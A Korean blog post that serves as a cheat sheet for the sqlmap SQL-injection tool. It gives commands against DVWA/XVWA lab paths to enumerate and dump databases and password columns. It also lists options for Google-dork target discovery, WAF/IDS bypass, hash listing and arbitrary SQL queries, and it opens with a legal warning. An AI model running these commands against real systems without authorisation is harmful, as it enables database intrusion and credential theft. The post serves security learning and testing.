이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다.
SQLMAP 사용법 정리
기본정보 확인
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -v 5
sqlmap.py -u "http://webhacking.kr/challenge/web/web-02/admin/index.php" -v 5
데이터베이스 이름 가져오는 명령
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -v 5 --dbms="MySQL" --os="Windows" --dbs
데이터베이스 테이블 확인
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa --tables
데이터베이스 테이블의 컬럼 확인
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa -T users --columns
Dump 명령어를 통한 정보 출력
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa -T users -C passowrd --dump
Google dork 결과를 대상 주소로 처리하기
sqlmap.py -g "inurl:\".php?id=1\"" -> 파라미터가 id=1 인값을 자동으로 찾는다
sqlmap.py -u "http://domain_IP/xvwa/vulnerabilities/sqli_blind/" --data="item=1&search=" --dbs
옵션 정보 확인
--data
HTTP 메소드중 Get 메소드가 아닌 POST 요청으로 전송할때 사용
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/" --data="id=1" --dbs
sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" --dbs
HTTP User-Agent 헤더 변경
--banner
시스템 버전과 패치 정보 확인
--current-user
DB 관리 시스템의 사용자 정보 검색
--current-db
현재 연결된 DB 이름을 확인
--hostname
서버 호스트 이름을 검색
--users
사용자 목록을 출력
--passwords
암호 해시를 나열
--schema --batch --exclude-sysdbs
모든 데이터베이스의 테이블 을 출력
--count -D -T -C
항목수를 표시하기 위해 사용
-hpp
WAF/IPS/IDS 를 우회
--identify-waf
보안장비 사용자 인증
--mobile
User-Agent 헤더를 모바일로 사용
--offline
이전 세션 데이터 값을 사용 연결시도는 0이 됨
--sqlmap-shell
사용자 전환
sqlmap --cookie="" --random-agent --level=1 --rist=1 -u [URL] --sql-query="select passhash from users"
'Code::Security > ETC' 카테고리의 다른 글
2021 OWASP TOP10 (0) | 2022.09.05 |
---|---|
윈도우 명령 프롬프트(CMD) 및 명령어 알아보기 (0) | 2022.08.10 |
공개 도구를 이용한 홈페이지 취약점 점검 안내서 (0) | 2021.06.17 |
XSS 기본 태그 사용법 정리 (0) | 2021.06.17 |
OfficeMalScanner.exe를 이용한 MS Office 매크로 코드 추출법 (0) | 2018.09.19 |